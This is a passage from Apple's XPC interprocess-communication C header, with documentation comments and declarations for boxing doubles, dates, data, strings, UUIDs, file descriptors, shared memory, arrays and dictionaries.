* * @abstract * Creates an XPC double object. * * @param value * The floating point quantity which is to be boxed. * * @result * A new floating point object. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_MALLOC XPC_RETURNS_RETAINED XPC_WARN_RESULT xpc_object_t xpc_double_create(double value); /*! * @function xpc_double_get_value * * @abstract * Returns the underlying double-precision floating point value from an object. * * @param xdouble * The floating point object which is to be examined. * * @result * The underlying floating point value or NAN if the given object was not an XPC * floating point object. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_WARN_RESULT XPC_NONNULL1 double xpc_double_get_value(xpc_object_t xdouble); #pragma mark Date /*! * @function xpc_date_create * * @abstract * Creates an XPC date object. * * @param interval * The date interval which is to be boxed. Negative values indicate the number * of nanoseconds before the epoch. Positive values indicate the number of * nanoseconds after the epoch. * * @result * A new date object. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_MALLOC XPC_RETURNS_RETAINED XPC_WARN_RESULT xpc_object_t xpc_date_create(int64_t interval); /*! * @function xpc_date_create_from_current * * @abstract * Creates an XPC date object representing the current date. * * @result * A new date object representing the current date. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_MALLOC XPC_RETURNS_RETAINED XPC_WARN_RESULT xpc_object_t xpc_date_create_from_current(void); /*! * @function xpc_date_get_value * * @abstract * Returns the underlying date interval from an object. * * @param xdate * The date object which is to be examined. * * @result * The underlying date interval or 0 if the given object was not an XPC date * object. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_WARN_RESULT XPC_NONNULL1 int64_t xpc_date_get_value(xpc_object_t xdate); #pragma mark Data /*! * @function xpc_data_create * * @abstract * Creates an XPC object representing buffer of bytes. * * @param bytes * The buffer of bytes which is to be boxed. You may create an empty data object * by passing NULL for this parameter and 0 for the length. Passing NULL with * any other length will result in undefined behavior. * * @param length * The number of bytes which are to be boxed. * * @result * A new data object. * * @discussion * This method will copy the buffer given into internal storage. After calling * this method, it is safe to dispose of the given buffer. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_MALLOC XPC_RETURNS_RETAINED XPC_WARN_RESULT xpc_object_t xpc_data_create(const void * _Nullable XPC_SIZEDBY(length) bytes, size_t length); /*! * @function xpc_data_create_with_dispatch_data * * @abstract * Creates an XPC object representing buffer of bytes described by the given GCD * data object. * * @param ddata * The GCD data object containing the bytes which are to be boxed. This object * is retained by the data object. * * @result * A new data object. * * @discussion * The object returned by this method will refer to the buffer returned by * dispatch_data_create_map(). The point where XPC will make the call to * dispatch_data_create_map() is undefined. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_MALLOC XPC_RETURNS_RETAINED XPC_WARN_RESULT XPC_NONNULL1 xpc_object_t xpc_data_create_with_dispatch_data(dispatch_data_t ddata); /*! * @function xpc_data_get_length * * @abstract * Returns the length of the data encapsulated by an XPC data object. * * @param xdata * The data object which is to be examined. * * @result * The length of the underlying boxed data or 0 if the given object was not an * XPC data object. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_WARN_RESULT XPC_NONNULL1 size_t xpc_data_get_length(xpc_object_t xdata); /*! * @function xpc_data_get_bytes_ptr * * @abstract * Returns a pointer to the internal storage of a data object. * * @param xdata * The data object which is to be examined. * * @result * A pointer to the underlying boxed data or NULL if the given object was not an * XPC data object. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_WARN_RESULT XPC_NONNULL1 const void * _Nullable xpc_data_get_bytes_ptr(xpc_object_t xdata); /*! * @function xpc_data_get_bytes * * @abstract * Copies the bytes stored in an data objects into the specified buffer. * * @param xdata * The data object which is to be examined. * * @param buffer * The buffer in which to copy the data object's bytes. * * @param off * The offset at which to begin the copy. If this offset is greater than the * length of the data element, nothing is copied. Pass 0 to start the copy * at the beginning of the buffer. * * @param length * The length of the destination buffer. * * @result * The number of bytes that were copied into the buffer or 0 if the given object * was not an XPC data object. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_WARN_RESULT XPC_NONNULL1 XPC_NONNULL2 size_t xpc_data_get_bytes(xpc_object_t xdata, void *buffer, size_t off, size_t length); #pragma mark String /*! * @function xpc_string_create * * @abstract * Creates an XPC object representing a NUL-terminated C-string. * * @param string * The C-string which is to be boxed. * * @result * A new string object. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_MALLOC XPC_RETURNS_RETAINED XPC_WARN_RESULT XPC_NONNULL1 xpc_object_t xpc_string_create(const char *string); /*! * @function xpc_string_create_with_format * * @abstract * Creates an XPC object representing a C-string that is generated from the * given format string and arguments. * * @param fmt * The printf(3)-style format string from which to construct the final C-string * to be boxed. * * @param ... * The arguments which correspond to those specified in the format string. * * @result * A new string object. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_MALLOC XPC_RETURNS_RETAINED XPC_WARN_RESULT XPC_NONNULL1 XPC_PRINTF(1, 2) xpc_object_t xpc_string_create_with_format(const char *fmt, ...); /*! * @function xpc_string_create_with_format_and_arguments * * @abstract * Creates an XPC object representing a C-string that is generated from the * given format string and argument list pointer. * * @param fmt * The printf(3)-style format string from which to construct the final C-string * to be boxed. * * @param ap * A pointer to the arguments which correspond to those specified in the format * string. * * @result * A new string object. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_MALLOC XPC_RETURNS_RETAINED XPC_WARN_RESULT XPC_NONNULL1 XPC_PRINTF(1, 0) xpc_object_t xpc_string_create_with_format_and_arguments(const char *fmt, va_list ap); /*! * @function xpc_string_get_length * * @abstract * Returns the length of the underlying string. * * @param xstring * The string object which is to be examined. * * @result * The length of the underlying string, not including the NUL-terminator, or 0 * if the given object was not an XPC string object. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_WARN_RESULT XPC_NONNULL_ALL size_t xpc_string_get_length(xpc_object_t xstring); /*! * @function xpc_string_get_string_ptr * * @abstract * Returns a pointer to the internal storage of a string object. * * @param xstring * The string object which is to be examined. * * @result * A pointer to the string object's internal storage or NULL if the given object * was not an XPC string object. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_WARN_RESULT XPC_NONNULL1 const char * _Nullable xpc_string_get_string_ptr(xpc_object_t xstring); #pragma mark UUID /*! * @function xpc_uuid_create * * @abstract * Creates an XPC object representing a universally-unique identifier (UUID) as * described by uuid(3). * * @param uuid * The UUID which is to be boxed. * * @result * A new UUID object. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_MALLOC XPC_RETURNS_RETAINED XPC_WARN_RESULT XPC_NONNULL1 xpc_object_t xpc_uuid_create(const uuid_t XPC_NONNULL_ARRAY uuid); /*! * @function xpc_uuid_get_bytes * * @abstract * Returns a pointer to the the boxed UUID bytes in an XPC UUID object. * * @param xuuid * The UUID object which is to be examined. * * @result * The underlying uuid_t bytes or NULL if the given object was not * an XPC UUID object. The returned pointer may be safely passed to the uuid(3) * APIs. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NONNULL1 const uint8_t * _Nullable xpc_uuid_get_bytes(xpc_object_t xuuid); #pragma mark File Descriptors /*! * @function xpc_fd_create * * @abstract * Creates an XPC object representing a POSIX file descriptor. * * @param fd * The file descriptor which is to be boxed. * * @result * A new file descriptor object. NULL if sufficient memory could not be * allocated or if the given file descriptor was not valid. * * @discussion * This method performs the equivalent of a dup(2) on the descriptor, and thus * it is safe to call close(2) on the descriptor after boxing it with a file * descriptor object. * * IMPORTANT: Pointer equality is the ONLY valid test for equality between two * file descriptor objects. There is no reliable way to determine whether two * file descriptors refer to the same inode with the same capabilities, so two * file descriptor objects created from the same underlying file descriptor * number will not compare equally with xpc_equal(). This is also true of a * file descriptor object created using xpc_copy() and the original. * * This also implies that two collections containing file descriptor objects * cannot be equal unless the exact same object was inserted into both. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_MALLOC XPC_RETURNS_RETAINED XPC_WARN_RESULT xpc_object_t _Nullable xpc_fd_create(int fd); /*! * @function xpc_fd_dup * * @abstract * Returns a file descriptor that is equivalent to the one boxed by the file * file descriptor object. * * @param xfd * The file descriptor object which is to be examined. * * @result * A file descriptor that is equivalent to the one originally given to * xpc_fd_create(). If the descriptor could not be created or if the given * object was not an XPC file descriptor, -1 is returned. * * @discussion * Multiple invocations of xpc_fd_dup() will not return the same file descriptor * number, but they will return descriptors that are equivalent, as though they * had been created by dup(2). * * The caller is responsible for calling close(2) on the returned descriptor. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_WARN_RESULT XPC_NONNULL1 int xpc_fd_dup(xpc_object_t xfd); #pragma mark Shared Memory /*! * @function xpc_shmem_create * * @abstract * Creates an XPC object representing the given shared memory region. * * @param region * A pointer to a region of shared memory, created through a call to mmap(2) * with the MAP_SHARED flag, which is to be boxed. * * @param length * The length of the region. * * @result * A new shared memory object. * * @discussion * Only memory regions whose exact characteristics are known to the caller * should be boxed using this API. Memory returned from malloc(3) may not be * safely shared on either OS X or iOS because the underlying virtual memory * objects for malloc(3)ed allocations are owned by the malloc(3) subsystem and * not the caller of malloc(3). * * If you wish to share a memory region that you receive from another subsystem, * part of the interface contract with that other subsystem must include how to * create the region of memory, or sharing it may be unsafe. * * Certain operations may internally fragment a region of memory in a way that * would truncate the range detected by the shared memory object. vm_copy(), for * example, may split the region into multiple parts to avoid copying certain * page ranges. For this reason, it is recommended that you delay all VM * operations until the shared memory object has been created so that the VM * system knows that the entire range is intended for sharing. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_MALLOC XPC_RETURNS_RETAINED XPC_WARN_RESULT XPC_NONNULL1 xpc_object_t xpc_shmem_create(void *region, size_t length); /*! * @function xpc_shmem_map * * @abstract * Maps the region boxed by the XPC shared memory object into the caller's * address space. * * @param xshmem * The shared memory object to be examined. * * @param region * On return, this will point to the region at which the shared memory was * mapped. * * @result * The length of the region that was mapped. If the mapping failed or if the * given object was not an XPC shared memory object, 0 is returned. The length * of the mapped region will always be an integral page size, even if the * creator of the region specified a non-integral page size. * * @discussion * The resulting region must be disposed of with munmap(2). * * It is the responsibility of the caller to manage protections on the new * region accordingly. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_WARN_RESULT XPC_NONNULL_ALL size_t xpc_shmem_map(xpc_object_t xshmem, void * _Nullable * _Nonnull region); #pragma mark Array /*! * @typedef xpc_array_applier_t * A block to be invoked for every value in the array. * * @param index * The current index in the iteration. * * @param value * The current value in the iteration. * * @result * A Boolean indicating whether iteration should continue. */ #ifdef __BLOCKS__ typedef bool (^xpc_array_applier_t)(size_t index, xpc_object_t _Nonnull value); #endif // __BLOCKS__ /*! * @function xpc_array_create * * @abstract * Creates an XPC object representing an array of XPC objects. * * @discussion * This array must be contiguous and cannot contain any NULL values. If you * wish to insert the equivalent of a NULL value, you may use the result of * {@link xpc_null_create}. * * @param objects * An array of XPC objects which is to be boxed. The order of this array is * preserved in the object. If this array contains a NULL value, the behavior * is undefined. This parameter may be NULL only if the count is 0. * * @param count * The number of objects in the given array. If the number passed is less than * the actual number of values in the array, only the specified number of items * are inserted into the resulting array. If the number passed is more than * the the actual number of values, the behavior is undefined. * * @result * A new array object. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_MALLOC XPC_RETURNS_RETAINED XPC_WARN_RESULT xpc_object_t xpc_array_create( const xpc_object_t _Nonnull *XPC_COUNTEDBY(count) _Nullable objects, size_t count); /*! * @function xpc_array_create_empty * * @abstract * Creates an XPC object representing an array of XPC objects. * * @result * A new array object. * * @see * xpc_array_create */ API_AVAILABLE(macos(11.0), ios(14.0), tvos(14.0), watchos(7.0)) XPC_EXPORT XPC_MALLOC XPC_RETURNS_RETAINED XPC_WARN_RESULT xpc_object_t xpc_array_create_empty(void); /*! * @function xpc_array_set_value * * @abstract * Inserts the specified object into the array at the specified index. * * @param xarray * The array object which is to be manipulated. * * @param index * The index at which to insert the value. This value must lie within the index * space of the array (0 to N-1 inclusive, where N is the count of the array). * If the index is outside that range, the behavior is undefined. * * @param value * The object to insert. This value is retained by the array and cannot be * NULL. If there is already a value at the specified index, it is released, * and the new value is inserted in its place. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NONNULL1 XPC_NONNULL3 void xpc_array_set_value(xpc_object_t xarray, size_t index, xpc_object_t value); /*! * @function xpc_array_append_value * * @abstract * Appends an object to an XPC array. * * @param xarray * The array object which is to be manipulated. * * @param value * The object to append. This object is retained by the array. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NONNULL1 XPC_NONNULL2 void xpc_array_append_value(xpc_object_t xarray, xpc_object_t value); /*! * @function xpc_array_get_count * * @abstract * Returns the count of values currently in the array. * * @param xarray * The array object which is to be examined. * * @result * The count of values in the array or 0 if the given object was not an XPC * array. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_WARN_RESULT XPC_NONNULL1 size_t xpc_array_get_count(xpc_object_t xarray); /*! * @function xpc_array_get_value * * @abstract * Returns the value at the specified index in the array. * * @param xarray * The array object which is to be examined. * * @param index * The index of the value to obtain. This value must lie within the range of * indexes as specified in xpc_array_set_value(). * * @result * The object at the specified index within the array or NULL if the given * object was not an XPC array. * * @discussion * This method does not grant the caller a reference to the underlying object, * and thus the caller is not responsible for releasing the object. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NONNULL_ALL xpc_object_t xpc_array_get_value(xpc_object_t xarray, size_t index); /*! * @function xpc_array_apply * * @abstract * Invokes the given block for every value in the array. * * @param xarray * The array object which is to be examined. * * @param applier * The block which this function applies to every element in the array. * * @result * A Boolean indicating whether iteration of the array completed successfully. * Iteration will only fail if the applier block returns false. * * @discussion * You should not modify an array's contents during iteration. The array indexes * are iterated in order. */ #ifdef __BLOCKS__ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NONNULL_ALL bool xpc_array_apply(xpc_object_t xarray, XPC_NOESCAPE xpc_array_applier_t applier); #endif // __BLOCKS__ #pragma mark Array Primitive Setters /*! * @define XPC_ARRAY_APPEND * A constant that may be passed as the destination index to the class of * primitive XPC array setters indicating that the given primitive should be * appended to the array. */ #define XPC_ARRAY_APPEND ((size_t)(-1)) /*! * @function xpc_array_set_bool * * @abstract * Inserts a bool (primitive) value into an array. * * @param xarray * The array object which is to be manipulated. * * @param index * The index at which to insert the value. This value must lie within the index * space of the array (0 to N-1 inclusive, where N is the count of the array) or * be XPC_ARRAY_APPEND. If the index is outside that range, the behavior is * undefined. * * @param value * The bool value to insert. After calling this method, the XPC * object corresponding to the primitive value inserted may be safely retrieved * with {@link xpc_array_get_value()}. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NONNULL1 void xpc_array_set_bool(xpc_object_t xarray, size_t index, bool value); /*! * @function xpc_array_set_int64 * * @abstract * Inserts an int64_t (primitive) value into an array. * * @param xarray * The array object which is to be manipulated. * * @param index * The index at which to insert the value. This value must lie within the index * space of the array (0 to N-1 inclusive, where N is the count of the array) or * be XPC_ARRAY_APPEND. If the index is outside that range, the behavior is * undefined. * * @param value * The int64_t value to insert. After calling this method, the XPC * object corresponding to the primitive value inserted may be safely retrieved * with {@link xpc_array_get_value()}. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NONNULL1 void xpc_array_set_int64(xpc_object_t xarray, size_t index, int64_t value); /*! * @function xpc_array_set_uint64 * * @abstract * Inserts a uint64_t (primitive) value into an array. * * @param xarray * The array object which is to be manipulated. * * @param index * The index at which to insert the value. This value must lie within the index * space of the array (0 to N-1 inclusive, where N is the count of the array) or * be XPC_ARRAY_APPEND. If the index is outside that range, the behavior is * undefined. * * @param value * The uint64_t value to insert. After calling this method, the XPC * object corresponding to the primitive value inserted may be safely retrieved * with {@link xpc_array_get_value()}. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NONNULL1 void xpc_array_set_uint64(xpc_object_t xarray, size_t index, uint64_t value); /*! * @function xpc_array_set_double * * @abstract * Inserts a double (primitive) value into an array. * * @param xarray * The array object which is to be manipulated. * * @param index * The index at which to insert the value. This value must lie within the index * space of the array (0 to N-1 inclusive, where N is the count of the array) or * be XPC_ARRAY_APPEND. If the index is outside that range, the behavior is * undefined. * * @param value * The double value to insert. After calling this method, the XPC * object corresponding to the primitive value inserted may be safely retrieved * with {@link xpc_array_get_value()}. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NONNULL1 void xpc_array_set_double(xpc_object_t xarray, size_t index, double value); /*! * @function xpc_array_set_date * * @abstract * Inserts a date value into an array. * * @param xarray * The array object which is to be manipulated. * * @param index * The index at which to insert the value. This value must lie within the index * space of the array (0 to N-1 inclusive, where N is the count of the array) or * be XPC_ARRAY_APPEND. If the index is outside that range, the behavior is * undefined. * * @param value * The date value to insert, represented as an int64_t. After * calling this method, the XPC object corresponding to the primitive value * inserted may be safely retrieved with {@link xpc_array_get_value()}. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NONNULL1 void xpc_array_set_date(xpc_object_t xarray, size_t index, int64_t value); /*! * @function xpc_array_set_data * * @abstract * Inserts a raw data value into an array. * * @param xarray * The array object which is to be manipulated. * * @param index * The index at which to insert the value. This value must lie within the index * space of the array (0 to N-1 inclusive, where N is the count of the array) or * be XPC_ARRAY_APPEND. If the index is outside that range, the behavior is * undefined. * * @param bytes * The raw data to insert. After calling this method, the XPC object * corresponding to the primitive value inserted may be safely retrieved with * {@link xpc_array_get_value()}. * * @param length * The length of the data. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NONNULL1 XPC_NONNULL3 void xpc_array_set_data(xpc_object_t xarray, size_t index, const void *XPC_SIZEDBY(length) bytes, size_t length); /*! * @function xpc_array_set_string * * @abstract * Inserts a C string into an array. * * @param xarray * The array object which is to be manipulated. * * @param index * The index at which to insert the value. This value must lie within the index * space of the array (0 to N-1 inclusive, where N is the count of the array) or * be XPC_ARRAY_APPEND. If the index is outside that range, the behavior is * undefined. * * @param string * The C string to insert. After calling this method, the XPC object * corresponding to the primitive value inserted may be safely retrieved with * {@link xpc_array_get_value()}. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NONNULL1 XPC_NONNULL3 void xpc_array_set_string(xpc_object_t xarray, size_t index, const char *string); /*! * @function xpc_array_set_uuid * * @abstract * Inserts a uuid_t (primitive) value into an array. * * @param xarray * The array object which is to be manipulated. * * @param index * The index at which to insert the value. This value must lie within the index * space of the array (0 to N-1 inclusive, where N is the count of the array) or * be XPC_ARRAY_APPEND. If the index is outside that range, the behavior is * undefined. * * @param uuid * The UUID primitive to insert. After calling this method, the XPC object * corresponding to the primitive value inserted may be safely retrieved with * {@link xpc_array_get_value()}. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NONNULL1 XPC_NONNULL3 void xpc_array_set_uuid(xpc_object_t xarray, size_t index, const uuid_t XPC_NONNULL_ARRAY uuid); /*! * @function xpc_array_set_fd * * @abstract * Inserts a file descriptor into an array. * * @param xarray * The array object which is to be manipulated. * * @param index * The index at which to insert the value. This value must lie within the index * space of the array (0 to N-1 inclusive, where N is the count of the array) or * be XPC_ARRAY_APPEND. If the index is outside that range, the behavior is * undefined. * * @param fd * The file descriptor to insert. After calling this method, the XPC object * corresponding to the primitive value inserted may be safely retrieved with * {@link xpc_array_get_value()}. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NONNULL1 void xpc_array_set_fd(xpc_object_t xarray, size_t index, int fd); /*! * @function xpc_array_set_connection * * @abstract * Inserts a connection into an array. * * @param xarray * The array object which is to be manipulated. * * @param index * The index at which to insert the value. This value must lie within the index * space of the array (0 to N-1 inclusive, where N is the count of the array) or * be XPC_ARRAY_APPEND. If the index is outside that range, the behavior is * undefined. * * @param connection * The connection to insert. After calling this method, the XPC object * corresponding to the primitive value inserted may be safely retrieved with * {@link xpc_array_get_value()}. The connection is NOT retained by the array. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NONNULL1 XPC_NONNULL3 void xpc_array_set_connection(xpc_object_t xarray, size_t index, xpc_connection_t connection); #pragma mark Array Primitive Getters /*! * @function xpc_array_get_bool * * @abstract * Gets a bool primitive value from an array directly. * * @param xarray * The array which is to be examined. * * @param index * The index of the value to obtain. This value must lie within the index space * of the array (0 to N-1 inclusive, where N is the count of the array). If the * index is outside that range, the behavior is undefined. * * @result * The underlying bool value at the specified index. false if the * value at the specified index is not a Boolean value. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_WARN_RESULT XPC_NONNULL1 bool xpc_array_get_bool(xpc_object_t xarray, size_t index); /*! * @function xpc_array_get_int64 * * @abstract * Gets an int64_t primitive value from an array directly. * * @param xarray * The array which is to be examined. * * @param index * The index of the value to obtain. This value must lie within the index space * of the array (0 to N-1 inclusive, where N is the count of the array). If the * index is outside that range, the behavior is undefined. * * @result * The underlying int64_t value at the specified index. 0 if the * value at the specified index is not a signed integer value. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_WARN_RESULT XPC_NONNULL1 int64_t xpc_array_get_int64(xpc_object_t xarray, size_t index); /*! * @function xpc_array_get_uint64 * * @abstract * Gets a uint64_t primitive value from an array directly. * * @param xarray * The array which is to be examined. * * @param index * The index of the value to obtain. This value must lie within the index space * of the array (0 to N-1 inclusive, where N is the count of the array). If the * index is outside that range, the behavior is undefined. * * @result * The underlying uint64_t value at the specified index. 0 if the * value at the specified index is not an unsigned integer value. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_WARN_RESULT XPC_NONNULL1 uint64_t xpc_array_get_uint64(xpc_object_t xarray, size_t index); /*! * @function xpc_array_get_double * * @abstract * Gets a double primitive value from an array directly. * * @param xarray * The array which is to be examined. * * @param index * The index of the value to obtain. This value must lie within the index space * of the array (0 to N-1 inclusive, where N is the count of the array). If the * index is outside that range, the behavior is undefined. * * @result * The underlying double value at the specified index. NAN if the * value at the specified index is not a floating point value. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_WARN_RESULT XPC_NONNULL1 double xpc_array_get_double(xpc_object_t xarray, size_t index); /*! * @function xpc_array_get_date * * @abstract * Gets a date interval from an array directly. * * @param xarray * The array which is to be examined. * * @param index * The index of the value to obtain. This value must lie within the index space * of the array (0 to N-1 inclusive, where N is the count of the array). If the * index is outside that range, the behavior is undefined. * * @result * The underlying date interval at the specified index. 0 if the value at the * specified index is not a date value. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_WARN_RESULT XPC_NONNULL1 int64_t xpc_array_get_date(xpc_object_t xarray, size_t index); /*! * @function xpc_array_get_data * * @abstract * Gets a pointer to the raw bytes of a data object from an array directly. * * @param xarray * The array which is to be examined. * * @param index * The index of the value to obtain. This value must lie within the index space * of the array (0 to N-1 inclusive, where N is the count of the array). If the * index is outside that range, the behavior is undefined. * * @param length * Upon return output, will contain the length of the data corresponding to the * specified key. * * @result * The underlying bytes at the specified index. NULL if the value at the * specified index is not a data value. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_WARN_RESULT XPC_NONNULL1 const void * _Nullable xpc_array_get_data(xpc_object_t xarray, size_t index, size_t * _Nullable length); /*! * @function xpc_array_get_string * * @abstract * Gets a C string value from an array directly. * * @param xarray * The array which is to be examined. * * @param index * The index of the value to obtain. This value must lie within the index space * of the array (0 to N-1 inclusive, where N is the count of the array). If the * index is outside that range, the behavior is undefined. * * @result * The underlying C string at the specified index. NULL if the value at the * specified index is not a C string value. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_WARN_RESULT XPC_NONNULL1 const char * _Nullable xpc_array_get_string(xpc_object_t xarray, size_t index); /*! * @function xpc_array_get_uuid * * @abstract * Gets a uuid_t value from an array directly. * * @param xarray * The array which is to be examined. * * @param index * The index of the value to obtain. This value must lie within the index space * of the array (0 to N-1 inclusive, where N is the count of the array). If the * index is outside that range, the behavior is undefined. * * @result * The underlying uuid_t value at the specified index. The null * UUID if the value at the specified index is not a UUID value. The returned * pointer may be safely passed to the uuid(3) APIs. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_WARN_RESULT XPC_NONNULL1 const uint8_t * _Nullable xpc_array_get_uuid(xpc_object_t xarray, size_t index); /*! * @function xpc_array_dup_fd * * @abstract * Gets a file descriptor from an array directly. * * @param xarray * The array which is to be examined. * * @param index * The index of the value to obtain. This value must lie within the index space * of the array (0 to N-1 inclusive, where N is the count of the array). If the * index is outside that range, the behavior is undefined. * * @result * A new file descriptor created from the value at the specified index. You are * responsible for close(2)ing this descriptor. -1 if the value at the specified * index is not a file descriptor value. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_WARN_RESULT XPC_NONNULL1 int xpc_array_dup_fd(xpc_object_t xarray, size_t index); /*! * @function xpc_array_create_connection * * @abstract * Creates a connection object from an array directly. * * @param xarray * The array which is to be examined. * * @param index * The index of the value to obtain. This value must lie within the index space * of the array (0 to N-1 inclusive, where N is the count of the array). If the * index is outside that range, the behavior is undefined. * * @result * A new connection created from the value at the specified index. You are * responsible for calling xpc_release() on the returned connection. NULL if the * value at the specified index is not an endpoint containing a connection. Each * call to this method for the same index in the same array will yield a * different connection. See {@link xpc_connection_create_from_endpoint()} for * discussion as to the responsibilities when dealing with the returned * connection. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_MALLOC XPC_RETURNS_RETAINED XPC_WARN_RESULT XPC_NONNULL1 xpc_connection_t _Nullable xpc_array_create_connection(xpc_object_t xarray, size_t index); /*! * @function xpc_array_get_dictionary * * @abstract * Returns the dictionary at the specified index in the array. * * @param xarray * The array object which is to be examined. * * @param index * The index of the value to obtain. This value must lie within the range of * indexes as specified in xpc_array_set_value(). * * @result * The object at the specified index within the array or NULL if the given * object was not an XPC array or if the the value at the specified index was * not a dictionary. * * @discussion * This method does not grant the caller a reference to the underlying object, * and thus the caller is not responsible for releasing the object. */ __OSX_AVAILABLE_STARTING(__MAC_10_11, __IPHONE_9_0) XPC_EXPORT XPC_WARN_RESULT XPC_NONNULL_ALL xpc_object_t _Nullable xpc_array_get_dictionary(xpc_object_t xarray, size_t index); /*! * @function xpc_array_get_array * * @abstract * Returns the array at the specified index in the array. * * @param xarray * The array object which is to be examined. * * @param index * The index of the value to obtain. This value must lie within the range of * indexes as specified in xpc_array_set_value(). * * @result * The object at the specified index within the array or NULL if the given * object was not an XPC array or if the the value at the specified index was * not an array. * * @discussion * This method does not grant the caller a reference to the underlying object, * and thus the caller is not responsible for releasing the object. */ __OSX_AVAILABLE_STARTING(__MAC_10_11, __IPHONE_9_0) XPC_EXPORT XPC_WARN_RESULT XPC_NONNULL_ALL xpc_object_t _Nullable xpc_array_get_array(xpc_object_t xarray, size_t index); #pragma mark Dictionary /*! * @typedef xpc_dictionary_applier_t * A block to be invoked for every key/value pair in the dictionary. * * @param key * The current key in the iteration. * * @param value * The current value in the iteration. * * @result * A Boolean indicating whether iteration should continue. */ #ifdef __BLOCKS__ typedef bool (^xpc_dictionary_applier_t)(const char * _Nonnull key, xpc_object_t _Nonnull value); #endif // __BLOCKS__ /*! * @function xpc_dictionary_create * * @abstract * Creates an XPC object representing a dictionary of XPC objects keyed to * C-strings. * * @param keys * An array of C-strings that are to be the keys for the values to be inserted. * Each element of this array is copied into the dictionary's internal storage. * Elements of this array may NOT be NULL. * * @param values * A C-array that is parallel to the array of keys, consisting of objects that * are to be inserted. Each element in this array is retained. Elements in this * array may be NULL. * * @param count * The number of key/value pairs in the given arrays. If the count is less than * the actual count of values, only that many key/value pairs will be inserted * into the dictionary. * * If the count is more than the the actual count of key/value pairs, the * behavior is undefined. If one array is NULL and the other is not, the * behavior is undefined. If both arrays are NULL and the count is non-0, the * behavior is undefined. * * @result * The new dictionary object. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_MALLOC XPC_RETURNS_RETAINED XPC_WARN_RESULT xpc_object_t xpc_dictionary_create( const char *XPC_CSTRING _Nonnull const 